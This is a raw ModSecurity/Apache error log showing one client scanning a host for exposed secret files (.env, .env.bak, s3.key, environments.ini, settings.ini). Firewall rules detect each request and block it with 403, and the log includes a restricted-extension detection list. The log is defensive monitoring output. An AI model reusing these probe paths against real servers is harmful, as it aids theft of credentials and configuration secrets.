[Mon May 11 20:55:53.931899 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/product/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfQAAAIg"]
[Mon May 11 20:55:53.932043 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/product/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfQAAAIg"]
[Mon May 11 20:55:53.932234 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/product/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfQAAAIg"]
[Mon May 11 20:55:53.946464 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agImOVNddpkriGUb6ZV2nwAAAQw"]
[Mon May 11 20:55:53.946618 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agImOVNddpkriGUb6ZV2nwAAAQw"]
[Mon May 11 20:55:53.946797 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agImOVNddpkriGUb6ZV2nwAAAQw"]
[Mon May 11 20:55:53.956253 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agImOTP5Q_-MBliRCAxnKQAAABI"]
[Mon May 11 20:55:53.956408 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agImOTP5Q_-MBliRCAxnKQAAABI"]
[Mon May 11 20:55:53.956583 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agImOTP5Q_-MBliRCAxnKQAAABI"]
[Mon May 11 20:55:53.966507 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public-api/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfwAAAIg"]
[Mon May 11 20:55:53.966773 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public-api/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfwAAAIg"]
[Mon May 11 20:55:53.967029 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public-api/.env"] [unique_id "agImOZYn-x0CHsbEbP2tfwAAAIg"]
[Mon May 11 20:55:53.978443 2026] [proxy_fcgi:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:54.006569 2026] [proxy_fcgi:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:54.019676 2026] [proxy_fcgi:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:54.040548 2026] [proxy_fcgi:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:54.129030 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agImOiMeXtzav-mi9SyxdAAAAM8"]
[Mon May 11 20:55:54.129215 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agImOiMeXtzav-mi9SyxdAAAAM8"]
[Mon May 11 20:55:54.129429 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agImOiMeXtzav-mi9SyxdAAAAM8"]
[Mon May 11 20:55:54.232246 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agImOpYn-x0CHsbEbP2thAAAAIQ"]
[Mon May 11 20:55:54.232457 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agImOpYn-x0CHsbEbP2thAAAAIQ"]
[Mon May 11 20:55:54.232693 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agImOpYn-x0CHsbEbP2thAAAAIQ"]
[Mon May 11 20:55:54.359403 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/s3.key"] [unique_id "agImOjP5Q_-MBliRCAxnMgAAABI"]
[Mon May 11 20:55:54.359695 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/s3.key"] [unique_id "agImOjP5Q_-MBliRCAxnMgAAABI"]
[Mon May 11 20:55:54.359914 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/s3.key"] [unique_id "agImOjP5Q_-MBliRCAxnMgAAABI"]
[Mon May 11 20:55:54.458869 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /s3/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/s3/.env.bak"] [unique_id "agImOvjVc-A-CSptvm1xUgAAAEs"]
[Mon May 11 20:55:54.459032 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/s3/.env.bak"] [unique_id "agImOvjVc-A-CSptvm1xUgAAAEs"]
[Mon May 11 20:55:54.459234 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/s3/.env.bak"] [unique_id "agImOvjVc-A-CSptvm1xUgAAAEs"]
[Mon May 11 20:55:54.522515 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agImOpYn-x0CHsbEbP2tjQAAAIg"]
[Mon May 11 20:55:54.522745 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agImOpYn-x0CHsbEbP2tjQAAAIg"]
[Mon May 11 20:55:54.523003 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agImOpYn-x0CHsbEbP2tjQAAAIg"]
[Mon May 11 20:55:54.548169 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agImOvjVc-A-CSptvm1xVQAAAEs"]
[Mon May 11 20:55:54.548343 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agImOvjVc-A-CSptvm1xVQAAAEs"]
[Mon May 11 20:55:54.548537 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agImOvjVc-A-CSptvm1xVQAAAEs"]
[Mon May 11 20:55:54.549095 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/api/.env"] [unique_id "agImOjP5Q_-MBliRCAxnNwAAAAo"]
[Mon May 11 20:55:54.549288 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/api/.env"] [unique_id "agImOjP5Q_-MBliRCAxnNwAAAAo"]
[Mon May 11 20:55:54.549503 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/api/.env"] [unique_id "agImOjP5Q_-MBliRCAxnNwAAAAo"]
[Mon May 11 20:55:54.674603 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/services/environments.ini"] [unique_id "agImOlNddpkriGUb6ZV2sQAAARE"]
[Mon May 11 20:55:54.674836 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/services/environments.ini"] [unique_id "agImOlNddpkriGUb6ZV2sQAAARE"]
[Mon May 11 20:55:54.675019 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/services/environments.ini"] [unique_id "agImOlNddpkriGUb6ZV2sQAAARE"]
[Mon May 11 20:55:54.693758 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/settings.ini"] [unique_id "agImOlNddpkriGUb6ZV2sgAAARE"]
